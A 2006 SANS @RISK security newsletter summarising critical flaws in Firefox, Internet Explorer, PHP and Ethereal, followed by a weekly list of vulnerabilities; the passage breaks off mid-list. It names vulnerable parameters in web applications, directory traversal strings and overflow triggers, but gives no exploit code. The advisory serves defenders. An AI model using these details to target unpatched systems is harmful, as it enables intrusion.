Last day to save $500 for SANS San Diego 2013

@RISK: The Consensus Security Vulnerability Alert

Volume: V, Issue: 17
May 1, 2006

SANS Newsletters Home

@RISK is the SANS community's consensus bulletin summarizing the most important vulnerabilities and exploits identified during the past week and providing guidance on appropriate actions to protect your systems (PART I). It also includes a comprehensive list of all new vulnerabilities discovered in the past week (PART II).

Summary of the vulnerabilities reported this week:

    • Category
    • # of Updates & Vulnerabilities
    • Other Microsoft Products
    • 3 (#3, #5)
    • Third Party Windows Apps
    • 11 (#7)
    • Mac OS
    • 1
    • Linux
    • 2
    • Solaris
    • 1
    • Unix
    • 4 (#9)
    • Cross Platform
    • 15 (#1, #2, #6, #8)
    • Web Application - Cross Site Scripting
    • 9
    • Web Application - SQL Injection
    • 9
    • Web Application
    • 13 (#4)
    • Network Device
    • 4

************************** Sponsored By Sourcefire *****************************

Sourcefire, the creator of Snort®, is offering the Open Source Snort community two comprehensive courses: "Snort: Building and Operating" and "Snort Rules."

Purchase both Snort courses either as an instructor-led or 60-day online training bundle and receive a FREE Snort Certified Professional exam (save $395).

For more information: http://www.sans.org/info.php?id=1129

Contact Sourcefire Training at 800.501.6008 or at: http://www.sans.org/info.php?id=1130

********************************************************************************

July 5-13 - Bring your family for the fireworks and stay for SANS largest conference in Washington.

The industry's best security courses - extraordinary faculty; authoritative up-to-the-minute material - shows you how to do the job and gives you the confidence to go back and do it immediately.

"Jacked my paranoia level up around my ears, and then gave me the tools to manage the threat." (Don Geiger, DCPS Division of Technology)

Offers every one of SANS' 17 immersion training courses plus 12 short courses and a big exposition: SANS Security Essentials, Hacker Exploits, System Forensics, Intrusion Detection, Auditing, plus training for CISSP exam and all Technical certification required for DoD 8570 and more. Plus special evening sessions by the global security leaders who staff the Internet Storm Center.

http://www.sans.org/sansfire06/

*************************************************************************

Table Of Contents
Part II -- Comprehensive List of Newly Discovered Vulnerabilities from Qualys (www.qualys.com)
Other Microsoft Products
Third Party Windows Apps
Mac Os
Linux
Solaris
Unix
Cross Platform
Web Application - Cross Site Scripting
Web Application - SQL Injection
Web Application
Network Device

**************************** Sponsored Link: ***********************************

1) Free SANS First Wednesday Webcast this week - "Web Application Security" Wednesday, May 03 at 1:00 PM EDT (1700 UTC/GMT) http://www.sans.org/info.php?id=1131

********************************************************************************

PART I Critical Vulnerabilities

Part I is compiled by Rohit Dhamankar and Rob King at TippingPoint, a division of 3Com, as a by-product of that company's continuous effort to ensure that its intrusion prevention products effectively block exploits using known vulnerabilities. TippingPoint's analysis is complemented by input from a council of security managers from twelve large organizations who confidentially share with SANS the specific actions they have taken to protect their systems. A detailed description of the process may be found at http://www.sans.org/newsletters/cva/#process

Widely Deployed Software
  • (1) HIGH: Firefox JavaScript Remote Code Execution Vulnerability
  • Affected:
    • Firefox version 1.5.0.2 and prior

  • Description: Firefox reportedly contains a buffer overflow in handling the "iframe.contentWindow.focus()" JavaScript function. A specially crafted webpage can exploit this flaw to execute arbitrary code on a user's system. Proof-of-concept exploit code, which crashes Firefox, has been publicly posted.

  • Status: Vendor has not confirmed, no patches available yet.

  • References:
  • (3) MODERATE: Internet Explorer Modal Dialog Code Execution
  • Affected:
    • Internet Explorer, all versions

  • Description: A security researcher has reported a flaw in Internet Explorer that can be exploited to install arbitrary programs such as keystroke loggers, adware or spyware on a user's system with minimal user interaction. The problem arises because Internet Explorer contains a race condition in handling "modal dialogs". These dialogs are used to request user input for a security related action such as downloading a program. By exploiting this vulnerability, a maliciously crafted webpage can influence the modal dialog decision and compromise a client system. Exploit code has not been publicly posted.

  • Status: Microsoft has fixed a particular attack vector for this vulnerability in MS05-054. However, according to the researcher, this patch does not fully address the vulnerability. Microsoft is aware of the flaw. No updates are available yet. A workaround is to set the security settings in Internet Explorer to either "enable" or "disable" rather than prompt. This will prevent opening of modal dialog boxes. A general workaround to prevent Internet Explorer from installing programs is to run Internet Explorer with limited privileges. Microsoft "DropMyRights" tool can be used for such purposes.

  • References:
  • (4) MODERATE: PHP wordwrap() Function Buffer Overflow
  • Affected:
    • PHP version 4.4.2 and prior
    • PHP version 5.1.2 and prior

  • Description: PHP is a package installed on a large number of web servers and used by multiple content management and bulletin board software packages. The PHP "wordwrap()" function, which wraps a string to given number of characters using a string break character, reportedly contains a buffer overflow. Any PHP scripts that use this function and pass user-input to it are vulnerable. The flaw can be exploited to execute arbitrary code on the webserver hosting such scripts. Note that hosting sites should upgrade the PHP packages as soon as a fix is available.

  • Status: Vendor not confirmed, no updates available.

  • References:
  • (5) UPDATE: Internet Explorer Nested Object Tag Memory Corruption

  • Description: Secunia Research has verified that a variation of the publicly reported 0-day IE vulnerability can be exploited to execute arbitrary code on a fully patched Windows XP SP2 system. The technical details of this attack vector have not been publicly posted. Microsoft is reportedly working on a fix.

  • References:
Other Software
  • (7) HIGH: Juniper Networks SSL-VPN Client Buffer Overflow
  • Affected:
    • Juniper SSL-VPN JuniperSetup Control

  • Description: SSL-VPN is an access technology designed for secure remote access. Accessing non-web applications remotely in this fashion requires that the clients have an ActiveX control installed on their systems. Juniper SSL-VPN client ActiveX control, JuniperSetup.ocx, contains a stack-based buffer overflow in its "JuniperSetupDLL.dll" module. Passing an overlong "ProductName" to this module triggers the overflow that can be exploited to execute arbitrary code on a Juniper SSL-VPN client software user. The technical details required to craft an exploit have been publicly posted.

  • Status: Juniper confirmed, patch available.

  • References:
  • (8) HIGH: Ethereal Multiple Protocol Decoding Vulnerabilities
  • Affected: Ethereal version 0.8.5 through 0.10.14

  • Description: Ethereal is a very popular open source network sniffer and protocol analyzer for Unix and Windows platforms. The software contains one or more buffer overflow vulnerabilities in parsing COPS and ALCAP protocols as well as handling Network Instruments and NetXRay/Windows sniffer file. These buffer overflows can be exploited to execute arbitrary code with the privileges of the ethereal process (typically "root" when ethereal is being used as a sniffer). To exploit these flaws, an attacker has to either inject the malicious packets into the network traffic being sniffed by ethereal, or entice a client to open a specially crafted packet capture file. Note that any network applications based on ethereal protocol decoder modules may also be affected.

  • Status: Vendor confirmed, upgrade to version 0.99.0, which also fixes a number of DoS vulnerabilities in parsing other protocols.

  • References:
Part II: Weekly Comprehensive List of Newly Discovered Vulnerabilities
Week 17, 2006

This list is compiled by Qualys ( www.qualys.com ) as part of that company's ongoing effort to ensure its vulnerability management web service tests for all known vulnerabilities that can be scanned. As of this week Qualys scans for 4995 unique vulnerabilities. For this special SANS community listing, Qualys also includes vulnerabilities that cannot be scanned remotely.

  • 06.17.1 - CVE: Not Available
  • Platform: Other Microsoft Products
  • Title: Microsoft Internet Explorer Nested OBJECT Tag Memory Corruption
  • Description: Microsoft Internet Explorer is prone to a memory corruption vulnerability. This issue is due to flawed handling of malformed HTML content. HTML content that contains nested <OBJECT> tags without corresponding </OBJECT> closure tags may trigger this issue. This issue reportedly causes a NULL pointer dereference in the "mshtml.dll" library, crashing Internet Explorer. An attacker could exploit this issue via a malicious web page to potentially execute arbitrary code in the context of the currently logged-in user. Microsoft Internet Explorer 6 for Microsoft Windows XP SP2 is reportedly vulnerable to this issue.
  • Ref: http://www.securityfocus.com/archive/1/431796
  • 06.17.2 - CVE: Not Available
  • Platform: Other Microsoft Products
  • Title: Microsoft Internet Explorer Modal Dialog Manipulation
  • Description: Internet Explorer is prone to a remote code execution vulnerability through exploiting a race condition when displaying modal security dialog boxes. This issue presents itself when web pages attempt to cause actions to be carried out that result in a modal security dialog to be displayed requesting permission for the action from users. Attackers may attempt to coerce users into clicking on an object, or pressing specific key sequences, while simultaneously attempting an action that will result in a dialog box being displayed. This issue may be exploited to cause users to inadvertently allow remote code to be executed. Ref: http://archives.neohapsis.com/archives/fulldisclosure/2006-04/0759.html
  • 06.17.3 - CVE: Not Available
  • Platform: Other Microsoft Products
  • Title: Internet Explorer MHTML URI Handler Information Disclosure
  • Description: Microsoft Internet Explorer is vulnerable to a cross domain information disclosure issue because the browser fails to correctly handle redirections with the "mhtml:" URI handler. See the reference for further details. Ref: http://secunia.com/Internet_Explorer_Arbitrary_Content_Disclosure_Vulnerability_Test/ http://www.securityfocus.com/bid/17717
  • 06.17.4 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: iOpus Secure Email Attachments Encryption Weakness
  • Description: iOpus Secure Email Attachments is an application used to create self-extracting, encrypted email attachments. It is vulnerable to an insecure encryption weakness due to a design flaw in the encryption algorithm used. All versions of iOpus Secure Email Attachments are vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/431904
  • 06.17.5 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Skulltag Remote Format String
  • Description: Skulltag is a Doom engine for Windows. It is reported prone to a remote format string vulnerability. A client can supply a specially-crafted version string containing format specifiers to execute malicious code. Skulltag version 0.96f is affected.
  • Ref: http://www.securityfocus.com/archive/1/431872
  • 06.17.6 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: IZArc Hostile Destination Path
  • Description: IZArc is a file compression/decompression application. It contains a vulnerability in the handling of pathnames in archived files. By specifying a path for an archived item that points outside the expected destination directory, the creator of the archive can cause the file to be extracted to arbitrary locations on the filesystem. IZArc version 3.5 beta 3 is vulnerable.
  • Ref: http://www.securityfocus.com/bid/17664/references
  • 06.17.7 - CVE: CVE-2006-2007
  • Platform: Third Party Windows Apps
  • Title: Winny File Transfer Heap Overflow
  • Description: Winny is a peer-to-peer file sharing application. It is vulnerable to a remote heap overflow issue because the application fails to perform bounds checking on a "strcpy()" operation during file transfers. Winny versions 2.0 b7.1 and earlier are vulnerable.
  • Ref: http://www.eeye.com/html/research/advisories/AD20060421.html
  • 06.17.8 - CVE: CVE-2006-1951
  • Platform: Third Party Windows Apps
  • Title: SolarWinds TFTP Server Directory Traversal
  • Description: TFTP Server is a TFTP protocol server for various Microsoft Windows platforms. TFTP Server is prone to a directory traversal vulnerability. The application does not properly sanitize user-supplied input of directory traversal strings "../../" allowing an attacker to specify arbitrary files for download. This may facilitate a complete compromise of the affected computer as the application is typically run with SYSTEM privileges.
  • Ref: http://www.rapid7.com/advisories/R7-0019.html
  • 06.17.9 - CVE: CVE-2006-2027
  • Platform: Third Party Windows Apps
  • Title: Pablo Software Solutions Quick 'n Easy FTP Server Logging Buffer Overflow
  • Description: Quick 'n Easy FTP Server is a FTP server for Windows. Quick 'n Easy FTP Server is prone to a buffer overflow vulnerability. To exploit this issue, an administrator must visit the log viewing portion of the application, as the issue is conjectured to be triggered in the log display functionality. The affected portion of the application converts the attacker-supplied log text to Unicode to display it for the administrator, complicating exploits. Quick 'n Easy FTP Server versions 3.0 and earlier are affected.
  • Ref: http://www.securityfocus.com/archive/1/431920
  • 06.17.10 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: PowerISO Directory Traversal
  • Description: PowerISO is an ISO, BIN, NRG, IMG and DAA file archiving application. It is vulnerable to a directory traversal issue when the application processes malicious ISO and BIN archives. PowerISO version 2.9 is vulnerable.
  • Ref: http://secway.org/advisory/AD20060428.txt
  • 06.17.11 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Multiple SpeedProject Products ACE Archive Filename Handling Buffer Overflow
  • Description: SpeedProject's products called Squeez and SpeedCommander both contain support for decompressing ACE archives. Multiple SpeedProject products are prone to a buffer-overflow vulnerability. This issue is exposed when the application extracts an ACE archive that contains a file with a long name. Squeez version 5.10 Build 4460 and SpeedCommander versions 10.52 Build 4450 and 11.01 Build 4450 are affected by this issue.
  • Ref: http://www.securityfocus.com/archive/1/432101
  • 06.17.12 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Juniper SSL-VPN Client ActiveX Control Remote Buffer Overflow
  • Description: Juniper provides an SSL-VPN client in the form of an ActiveX control for Microsoft Windows. It is prone to a buffer overflow vulnerability due to the use of unbounded memory-copy operations in the "JuniperSetupDLL.dll" library, which is loaded from the "JuniperSetup.ocx" ActiveX control. Arbitrary code would be executed in the context of the client application.
  • Ref: http://www.securityfocus.com/archive/1/432155
  • 06.17.13 - CVE: CVE-2006-1952
  • Platform: Third Party Windows Apps
  • Title: WinAgents TFTP Server Directory Traversal
  • Description: WinAgents TFTP Server is a TFTP protocol server. It is vulnerable to a directory traversal issue due to insufficient sanitization of ".../.../" strings. WinAgents TFTP Server versions 3.1 and earlier are vulnerable.
  • Ref: http://www.rapid7.com/advisories/R7-0020.html
  • 06.17.14 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: MagicISO Directory Traversal
  • Description: MagicISO is an ISO and BIN file archiving application. It is vulnerable to a directory traversal issue when the application processes malicious ISO and BIN archives. MagicISO version 5.0 Build 0166 is vulnerable.
  • Ref: http://secway.org/advisory/AD20060428.txt
  • 06.17.15 - CVE: Not Available
  • Platform: Mac Os
  • Title: Apple Safari Web Browser Rowspan Denial of Service
  • Description: Apple Safari web browser is prone to a denial of service vulnerability. The problem occurs when malicious HTML containing an excessively large "rowspan" value is viewed. An attacker can exploit this issue to consume excessive system resources and eventually crash an affected browser. Apple Safari versions 2.0.3 and earlier are affected.
  • Ref: http://www.yanux.ch/exploits/safari/bugreport_imac_g4.txt
  • 06.17.16 - CVE: CVE-2006-1513
  • Platform: Linux
  • Title: ABC2PS ABC Music Files Remote Buffer Overflow
  • Description: ABC2PS is a translator application for converting ABC music description files into PostScript. It is vulnerable to a remote buffer overflow issue due to insufficient boundary checks before copying user-supplied data into process buffers. ABC2PS version 1.3.3 is vulnerable.
  • Ref: http://www.securityfocus.com/bid/17689
  • 06.17.17 - CVE: Not Available
  • Platform: Linux
  • Title: abcMIDI ABC Music Files Remote Buffer Overflow
  • Description: abcMIDI is a package that contains the "yaps" program, which is a translator application for converting ABC music description files into PostScript. It is prone to a remote buffer overflow vulnerability when the application handles a specially-crafted ABC music description file.
  • Ref: http://www.securityfocus.com/bid/17704
  • 06.17.18 - CVE: CVE-2006-2064
  • Platform: Solaris
  • Title: Solaris PKCS#11 Library Local Privilege Escalation
  • Description: Sun Solaris support PKCS#11 (Public Key Cryptography Standards, standard number 11, a cryptographic token API). It is vulnerable to a local privilege escalation issue due to a failure of the PKCS#11 library to properly utilize non-reentrant functions. Sun Solaris versions 10 and 10_x86 are vulnerable.
  • Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-26-102316-1
  • 06.17.19 - CVE: CVE-2006-0048
  • Platform: Unix
  • Title: Tcpick Write.C Remote Denial of Service
  • Description: Tcpick is a TCP stream sniffer, tracker and capturer. It is susceptible to a remote denial of service vulnerability. This issue is due to the application's failure to properly handle specially-crafted packets. The problem occurs in "write.c" when the application is running with the "-yP" option. Ref: http://sourceforge.net/mailarchive/forum.php?thread_id=9989610&amp;forum_id=37151
  • 06.17.20 - CVE: Not Available
  • Platform: Unix
  • Title: Fenice Remote Buffer Overflow and Denial of Service Vulnerabilities
  • Description: Fenice is an Open Media Streaming server application. It is vulnerable to multiple remote issues such as a buffer overflow and denial of service. See the reference for further details. Fenice version 1.10 is vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/431870
  • 06.17.21 - CVE: Not Available
  • Platform: Unix
  • Title: DeleGate DNS Response Denial of Service
  • Description: DeleGate is prone to a remote denial of service vulnerability. The application fails to properly handle malformed DNS responses. An attacker can exploit this issue to crash the affected service, effectively denying service to legitimate users. The vendor has addressed this issue in versions 8.11.6 and 9.0.6.
  • Ref: http://www.niscc.gov.uk/niscc/docs/re-20060425-00312.pdf?lang=en
  • 06.17.22 - CVE: Not Available
  • Platform: Unix
  • Title: Paul A. Rombouts PDNSD DNS Query Denial of Service
  • Description: The pdnsd DNS server is prone to a remote denial of service vulnerability. The application fails to properly handle malformed DNS queries. The problem occurs when unsupported DNS QTYPE or QCLASS queries are sent to the affected DNS server. When the affected server handles these packets, a memory leak occurs. The vendor has addressed this issue in version 1.2.4-par.
  • Ref: http://www.niscc.gov.uk/niscc/docs/re-20060425-00312.pdf?lang=en
  • 06.17.23 - CVE: CVE-2006-1998, CVE-2006-1999
  • Platform: Cross Platform
  • Title: OpenTTD Multiple Denial of Service Vulnerabilities
  • Description: OpenTTD is a multiplayer role-playing game for multiple operating systems and is an open source clone of Transport Tycoon Deluxe. OpenTTD is prone to multiple remote denial of service vulnerabilities.
  • Ref: http://aluigi.altervista.org/adv/openttdx-adv.txt
  • 06.17.24 - CVE: CVE-2006-2017
  • Platform: Cross Platform
  • Title: Dnsmasq Broadcast Reply Denial of Service
  • Description: Dnsmasq is a DHCP and DNS server. It is vulnerable to a remote denial of service issue due to a design error in the application when receiving a DHCP client broadcast reply request. Dnsmasq version 2.29 is vulnerable.
  • Ref: http://thekelleys.org.uk/dnsmasq/CHANGELOG
  • 06.17.25 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Blender BVF File Import Python Code Execution
  • Description: Blender is a 3D modeling application. It is vulnerable to a Python code execution issue due to insufficient sanitization of user-supplied input of the "eval" statements. Blender version 2.36 is vulnerable.
  • Ref: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=330895
  • 06.17.26 - CVE: CVE-2006-0580
  • Platform: Cross Platform
  • Title: Lotus Domino Unspecified LDAP Denial of Service
  • Description: IBM Lotus Domino Server is an application framework for web-based collaborative software. It is vulnerable to an unspecified denial of service issue when malformed data is sent to the LDAP server on TCP port 389. IBM Lotus Domino version 7.0 is vulnerable.
  • Ref: http://www.gleg.net/flash/protover_lotus.html
  • 06.17.27 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Symantec AntiVirus Scan Engine Multiple Remote Vulnerabilities
  • Description: Symantec AntiVirus Scan Engine is a TCP/IP server and programming interface that enables third parties to incorporate support for Symantec content-scanning technologies into their proprietary applications. It is susceptible to multiple remote vulnerabilities. The first issue is due to the application's failure to properly authenticate web-based user logins. The second issue is due to the application's use of a static private DSA encryption key for SSL communication. The third issue is due to the application's failure to properly secure files containing potentially sensitive information from remote access. Version 5.0 of Symantec AntiVirus Scan Engine is affected by these vulnerabilities.
  • Ref: http://www.symantec.com/avcenter/security/Content/2006.04.21.html
  • 06.17.28 - CVE: Not Available
  • Platform: Cross Platform
  • Title: @1 Event Publisher Information Disclosure
  • Description: @1 Event Publisher is an event-management application. The application fails to secure access to the "eventpublisher.txt" file, allowing an attacker to obtain sensitive information from a log of private user comments. All current versions are affected.
  • Ref: http://www.securityfocus.com/bid/17647
  • 06.17.29 - CVE: CVE-2006-1931
  • Platform: Cross Platform
  • Title: Ruby WEBrick HTTP Server Denial of Service
  • Description: Ruby is an object-oriented scripting language. It is vulnerable to a denial of service issue in the WEBrick HTTP server due to the use of blocking sockets. Ruby versions 1.8.2 and earlier are vulnerable.
  • Ref: https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=189540
  • 06.17.30 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Mozilla Firefox iframe.contentWindow.focus Buffer Overflow
  • Description: Mozilla Firefox is prone to a buffer overflow vulnerability. This issue occurs when the browser renders JavaScript using the "js320.dll" and "xpcom_core.dll'"libraries. Specifically, a malformed "iframe.contentWindow.focus()" call can cause an overflow to occur. This could lead to a failure of the browser or potential arbitrary code execution in the context of the current user. Firefox versions 1.5.0.2 and earlier running on Windows and Linux are affected.
  • Ref: http://www.securityfocus.com/bid/17671
  • 06.17.31 - CVE: CVE-2006-1997
  • Platform: Cross Platform
  • Title: Sybase Pylon Anywhere Unauthorized Access
  • Description: Sybase Pylon Anywhere is an application that allows users to access Microsoft Exchange and Lotus Notes information remotely from a PDA or smartphone. It is vulnerable to an unspecified access validation issue. Pylon Anywhere versions 6.4.9 and earlier are vulnerable.
  • Ref: http://www.sybase.com/detail?id=1040213
  • - CVE: CVE-2006-1932, CVE-2006-1933, CVE-2006-1934, CVE-2006-1936, CVE-2006-1937, CVE-2006-1938, CVE-2006-1940
  • Platform: Cross Platform
  • Title: Ethereal Multiple Protocol Dissector Vulnerabilities
  • Description: Ethereal is a multi-platform network protocol sniffer and analyzer. Several vulnerabilities have been reported in various protocol dissectors. Ethereal could crash while reading a malformed sniffer capture, an invalid display filter and a specially-crafted statistics counter. These issues could allow remote attackers to execute arbitrary machine code in the context of the vulnerable application. Various vulnerabilities affect differing versions of Ethereal from 0.8.5 through to 0.10.14.
  • Ref: http://www.ethereal.com/appnotes/enpa-sa-00023.html
  • 06.17.33 - CVE: Not Available
  • Platform: Cross Platform
  • Title: ISC BIND TSIG Zone Transfer Denial of Service
  • Description: ISC BIND is prone to a remote denial of service vulnerability. This issue is due to a failure in the application to properly handle malformed TSIG (Secret Key Transaction Authentication for DNS) replies. This issue is triggered when BIND is configured with TSIG enabled, and it attempts to parse malformed TSIG messages during zone transfers.
  • Ref: http://www.securityfocus.com/bid/17692
  • 06.17.34 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Oracle 10g DBMS_EXPORT_EXTENSION SQL Injection
  • Description: Oracle 10g products are prone to a SQL injection vulnerability. This issue exists in the "GET_DOMAIN_INDEX_METADATA" function of the "DBMS_EXPORT_EXTENSION" package. Due to improper input validation, a remote attacker with access to the database can elevate their privilege level to those of the DBA. This vulnerability has not been patched.
  • Ref: http://www.securityfocus.com/archive/1/432078
  • 06.17.35 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Multiple Hitachi JP1 Products Denial of Service
  • Description: Multiple JP1 products are prone to a denial of service vulnerability. These issues occur when the affected applications receive requests or data unexpectedly. An attacker can exploit this issue to cause affected products to become unresponsive, resulting in a denial of service to legitimate users. Specific models and versions are listed in the reference link. Ref: http://www.hitachi-support.com/security_e/vuls_e/HS06-007_e/index-e.html
  • 06.17.36 - CVE: Not Available
  • Platform: Cross Platform
  • Title: PowerDNS Malformed EDNS0 Packet Remote Denial of Service
  • Description: PowerDNS is a nameserver application. It is vulnerable to a denial of service issue due to insufficient handling of malformed EDNSO packets. PowerDNS version 3.0 is vulnerable.
  • Ref: http://wiki.powerdns.com/projects/trac/changeset/760
  • 06.17.37 - CVE: Not Available
  • Platform: Cross Platform
  • Title: BL4 SMTP Server Buffer Overflow
  • Description: BL4 SMTP Server is a Mail Transfer Agent (MTA) server for Linux and Unix-like operating systems. It is susceptible to a remote buffer overflow vulnerability in its SMTP service when attackers repeatedly send more than 2100 bytes of data as an argument to the "HELO", "MAIL FROM" and "RCPT TO" commands. BL4 SMTP Server versions prior to 0.1.5 are affected.
  • Ref: http://www.securityfocus.com/archive/1/432329
  • 06.17.38 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Scry Gallery Index.PHP Cross-Site Scripting
  • Description: Scry Gallery is an image gallery application. Insufficient sanitization of the "p" parameter in the "index.php" script exposes the application to a cross-site scripting issue. Scry Gallery version 1.1 is affected.
  • Ref: http://www.securityfocus.com/bid/17668
  • 06.17.39 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Simplog ImageList.PHP Cross-Site Scripting
  • Description: Simplog is a weblog application. Insufficient sanitization of the "imagedir" parameter in the "imagelist.php" script exposes the application to a cross-site scripting issue. Simplog version 0.9.3 is affected.
  • Ref: http://www.securityfocus.com/bid/17653
  • 06.17.40 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: @1 Event Publisher Multiple HTML Injection Vulnerabilities
  • Description: @1 Event Publisher is an event notification, application implemented in Perl. @1 Event Publisher is prone to multiple HTML injection vulnerabilities. @1 Event Publisher 2003.12.18 is affected.
  • Ref: http://www.securityfocus.com/bid/17646
  • 06.17.41 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: LogMethods A2Z.JSP Cross-Site Scripting
  • Description: LogMethods is a bookmark portal application. Insufficient sanitization of the "kwd" parameter in the "/lms/a2z.jsp" script exposes the application to a cross-site scripting issue. LogMethods versions 0.9 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/17675
  • 06.17.42 - CVE: CVE-2006-2051
  • Platform: Web Application - Cross Site Scripting
  • Title: NextAge Shopping Cart Multiple HTML Injection Vulnerabilities
  • Description: NextAge Shopping Cart is a shopping cart application implemented in PHP. NextAge Shopping Cart is prone to multiple HTML injection vulnerabilities.
  • Ref: http://www.securityfocus.com/archive/1/431983
  • 06.17.43 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Instant Photo Gallery Multiple Cross-Site Scripting Vulnerabilities
  • Description: Instant Photo Gallery is a web-based photo album application. It is vulnerable to multiple cross-site scripting issues due to insufficient sanitization of user-supplied input to the "member.php", "portfolio.php" and "portfolio_photo_popup.php" scripts. Instant Photo Gallery version 1.0 is vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/432024
  • 06.17.44 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: CuteNews Multiple Cross-Site Scripting Vulnerabilities
  • Description: CuteNews is a news reader application. Insufficient sanitization of the "mod" and "source" parameters of the "index.php" script exposes the application to multiple cross-site scripting issues. CuteNews version 1.4.1 is affected.
  • Ref: http://www.securityfocus.com/bid/17700
  • 06.17.45 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: FarsiNews Multiple Cross-Site Scripting Vulnerabilities
  • Description: FarsiNews is a news reader application implemented in PHP. It is prone to multiple cross-site scripting vulnerabilities.
  • Ref: http://www.securityfocus.com/archive/1/432109
  • 06.17.46 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: DevBB Member.PHP Cross-Site Scripting
  • Description: DevBB is a web-based bulletin board application. It is vulnerable to a cross-site scripting issue due to insufficient sanitization of user-supplied input to the "member" parameter of the "member.php" script. DevBB version 1.0 is vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/432096
  • 06.17.47 - CVE: CVE-2006-2009
  • Platform: Web Application - SQL Injection
  • Title: PHPMyAgenda Agenda.PHP3 Remote File Include
  • Description: phpMyAgenda is a web application for managing events. It is implemented in PHP. phpMyAgenda is prone to a remote file include vulnerability. phpMyAgenda 3.0 Final and prior versions are affected.
  • Ref: http://www.securityfocus.com/archive/1/431862
  • 06.17.48 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Simplog Multiple SQL Injection Vulnerabilities
  • Description: Simplog is a web-based news application written in PHP. It is prone to multiple SQL injection vulnerabilities due to improper sanitization of user-supplied input. Simplog versions 0.9.3 and earlier are vulnerable to these issues.
  • Ref: http://www.securityfocus.com/archive/1/431760
  • 06.17.49 - CVE: CVE-2006-2004
  • Platform: Web Application - SQL Injection
  • Title: RI Blog Multiple SQL Injection Vulnerabilities
  • Description: RI Blog is a weblog application. The application is prone to multiple SQL injection vulnerabilities because it fails to properly sanitize user-supplied input.
  • Ref: http://www.securityfocus.com/bid/17654
  • 06.17.50 - CVE: CVE-2006-2039
  • Platform: Web Application - SQL Injection
  • Title: Help Center Live OSTicket Module Multiple SQL Injection Vulnerabilities
  • Description: Help Center Live is a helpdesk application implemented in PHP. The application is prone to multiple SQL injection vulnerabilities because it fails to properly sanitize user-supplied input.
  • Ref: http://www.securityfocus.com/bid/17676
  • 06.17.51 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Photokorn Multiple SQL Injection Vulnerabilities
  • Description: Photokorn is a photo album application. Insufficient sanitization of user-supplied input to various php scripts exposes the application to multiple SQL injection issues. Photokorn versions 1.542 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/17683
  • 06.17.52 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Invision Power Board Index.PHP CK Parameter SQL Injection
  • Description: Invision Power Board is web forum software. It is prone to an SQL injection vulnerability due to insufficient sanitization of user-supplied input to the "ck" parameter of the "index.php" script. Invision Board versions 2.1.5 and earlier are affected.
  • Ref: http://www.securityfocus.com/archive/1/431990
  • 06.17.53 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: DUPortal Pro Cat.ASP SQL Injection
  • Description: DUportal Pro is a web portal application. DUportal Pro is vulnerable to an SQL injection issue due to insufficient sanitization of user-supplied input to the "iCat" parameter of the "cat.asp" script. DUportal Pro version 3.4 is vulnerable.
  • Ref: http://www.aria-security.net/advisory/duportal.txt
  • 06.17.54 - CVE: CVE-2006-1817
  • Platform: Web Application - SQL Injection
  • Title: warforge.News Authcheck.PHP SQL Injection
  • Description: warforge.NEWS is a news reader application implemented in PHP. It is prone to an SQL injection vulnerability due to improper sanitization of user-supplied input to the "authusername" cookie parameter of the "authcheck.php" script. warforge.NEWS version 1.0 is affected.
  • Ref: http://evuln.com/vulns/125/summary.html
  • 06.17.55 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Invision Power Board Func_msg.PHP SQL Injection
  • Description: Invision Power Board is web forum software. It is prone to an SQL injection vulnerability due to insufficient sanitization of user-supplied input to the "to_by_id" parameter of the "func_msg.php" script. Invision Power Board version 2.1.4 is affected.
  • Ref: http://www.securityfocus.com/archive/1/432248
  • 06.17.56 - CVE: CVE-2006-1212
  • Platform: Web Application
  • Title: CoreNews Multiple Input Validation Vulnerabilities
  • Description: CoreNews is a web-based news application implemented in PHP. It is vulnerable to multiple input validation issues such as a remote file include issue and SQL injections. CoreNews versions 2.0.1 and earlier are vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/431761
  • 06.17.57 - CVE: CVE-2006-2002
  • Platform: Web Application
  • Title: My Gaming Ladder Stats.PHP Remote File Include
  • Description: My Gaming Ladder is a ladder and tournament web application. It is vulnerable to a remote file include issue due to insufficient sanitization of user-supplied input to the "dir[base]" parameter of the "stats.php" script. My Gaming Ladder version 7.0 is vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/431902
  • 06.17.58 - CVE: Not Available
  • Platform: Web Application
  • Title: Clansys Index.PHP Remote Code Execution
  • Description: Clansys is a web-based application. Insufficient sanitization of the "page" parameter in the "index.php" script exposes the application to a remote code execution issue. All current versions are affected.
  • Ref: http://www.securityfocus.com/bid/17660
  • 06.17.59 - CVE: Not Available
  • Platform: Web Application
  • Title: SL_site Multiple Input Validation Vulnerabilities
